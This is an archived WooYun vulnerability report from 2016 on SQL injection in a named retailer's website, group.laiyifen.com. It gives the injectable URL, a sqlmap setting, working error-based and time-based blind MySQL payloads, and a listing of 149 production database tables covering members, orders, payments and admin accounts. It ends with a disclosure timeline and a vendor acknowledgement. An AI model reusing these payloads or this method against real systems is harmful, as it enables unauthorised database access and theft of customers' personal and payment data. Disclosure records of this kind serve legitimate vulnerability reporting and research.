乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-08: 细节已通知厂商并且等待厂商处理中 2016-03-08: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向核心白帽子及相关领域专家公开 2016-03-28: 细节向普通白帽子公开 2016-04-07: 细节向实习白帽子公开 2016-04-22: 细节向公众公开
http://group.laiyifen.com/index.php/article-gonggao-lists-1*-2.html
需要--level 5
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://group.laiyifen.com:80/index.php/article-gonggao-lists-1" AND (SELECT 7127 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SELECT (ELT(7127=7127,1))),0x7162766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "WRsK"="WRsK-2.html Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://group.laiyifen.com:80/index.php/article-gonggao-lists-1" AND SLEEP(5) AND "Bnty"="Bnty-2.html---web application technology: Nginx, PHP 5.4.38back-end DBMS: MySQL 5.0Database: groupdb[149 tables]+---------------------------------+| sdb_aftersales_return_product || sdb_authenticator_clients || sdb_authenticator_requestlist || sdb_b2c_bcompany || sdb_b2c_brand || sdb_b2c_cart || sdb_b2c_cart_objects || sdb_b2c_comment_goods_point || sdb_b2c_comment_goods_type || sdb_b2c_counter || sdb_b2c_counter_attach || sdb_b2c_coupons || sdb_b2c_delivery || sdb_b2c_delivery_items || sdb_b2c_dly_h_area || sdb_b2c_dlycorp || sdb_b2c_dlytype || sdb_b2c_excard_rule || sdb_b2c_excard_used || sdb_b2c_fbtad || sdb_b2c_goods || sdb_b2c_goods_cat || sdb_b2c_goods_keywords || sdb_b2c_goods_lv_price || sdb_b2c_goods_promotion_ref || sdb_b2c_goods_rate || sdb_b2c_goods_spec_index || sdb_b2c_goods_type || sdb_b2c_goods_type_props || sdb_b2c_goods_type_props_value || sdb_b2c_goods_type_spec || sdb_b2c_goods_virtual_cat || sdb_b2c_history_orders || sdb_b2c_history_products || sdb_b2c_huodong_log || sdb_b2c_huodongda || sdb_b2c_jiang_huodong || sdb_b2c_jiang_log || sdb_b2c_jiang_members || sdb_b2c_lulu_card || sdb_b2c_lulu_exchange || sdb_b2c_member_addrs || sdb_b2c_member_advance || sdb_b2c_member_comments || sdb_b2c_member_coupon || sdb_b2c_member_goods || sdb_b2c_member_lv || sdb_b2c_member_msg || sdb_b2c_member_point || sdb_b2c_member_pwdlog || sdb_b2c_member_systmpl || sdb_b2c_members || sdb_b2c_order_coupon_user || sdb_b2c_order_delivery || sdb_b2c_order_items || sdb_b2c_order_log || sdb_b2c_order_objects || sdb_b2c_order_pmt || sdb_b2c_orders || sdb_b2c_products || sdb_b2c_recharge_log || sdb_b2c_reship || sdb_b2c_reship_items || sdb_b2c_sales_bangdingsp || sdb_b2c_sales_freeShipping || sdb_b2c_sales_freeshipping || sdb_b2c_sales_rule_goods || sdb_b2c_sales_rule_order || sdb_b2c_sell_logs || sdb_b2c_shop || sdb_b2c_spec_values || sdb_b2c_specification || sdb_b2c_type_brand || sdb_b2copenapi_api_fail || sdb_b2copenapi_api_log || sdb_b2copenapi_api_log_copy || sdb_b2copenapi_api_mobile_logs || sdb_b2copenapi_request_shops || sdb_base_app_content || sdb_base_apps || sdb_base_cache_expires || sdb_base_files || sdb_base_kvstore || sdb_base_network || sdb_base_queue || sdb_base_rpcnotify || sdb_base_rpcpoll || sdb_base_task || sdb_content_article_bodys || sdb_content_article_indexs || sdb_content_article_nodes || sdb_couponlog_order_coupon_ref || sdb_couponlog_order_coupon_user || sdb_dbeav_meta_register || sdb_dbeav_meta_value_datetime || sdb_dbeav_meta_value_decimal || sdb_dbeav_meta_value_int || sdb_dbeav_meta_value_longtext || sdb_dbeav_meta_value_text || sdb_dbeav_meta_value_varchar || sdb_dbeav_recycle || sdb_desktop_filter || sdb_desktop_flow || sdb_desktop_hasrole || sdb_desktop_menus || sdb_desktop_recycle || sdb_desktop_role_flow || sdb_desktop_roles || sdb_desktop_tag || sdb_desktop_tag_rel || sdb_desktop_user_flow || sdb_desktop_users || sdb_ectools_analysis || sdb_ectools_analysis_logs || sdb_ectools_currency || sdb_ectools_order_bills || sdb_ectools_payments || sdb_ectools_refunds || sdb_ectools_regions || sdb_express_dly_center || sdb_express_print_tmpl || sdb_gift_cat || sdb_gift_ref || sdb_giftpackage_giftpackage || sdb_giftpackage_order_ref || sdb_groupactivity_order_act || sdb_groupactivity_purchase || sdb_image_image || sdb_image_image_attach || sdb_operatorlogmanage_logs || sdb_operatorlogmanage_register || sdb_pam_account || sdb_pam_auth || sdb_pam_log || sdb_pam_logs || sdb_recommended_goods || sdb_recommended_goods_period || sdb_site_explorers || sdb_site_link || sdb_site_menus || sdb_site_modules || sdb_site_route_statics || sdb_site_seo || sdb_site_themes || sdb_site_themes_tmpl || sdb_site_widgets || sdb_site_widgets_instance || sdb_site_widgets_proinstance || sdb_timedbuy_objitems |+---------------------------------+
危害等级:高
漏洞Rank:19
确认时间:2016-03-08 14:14
感谢您对来伊份的支持,我们会努力做好!
暂无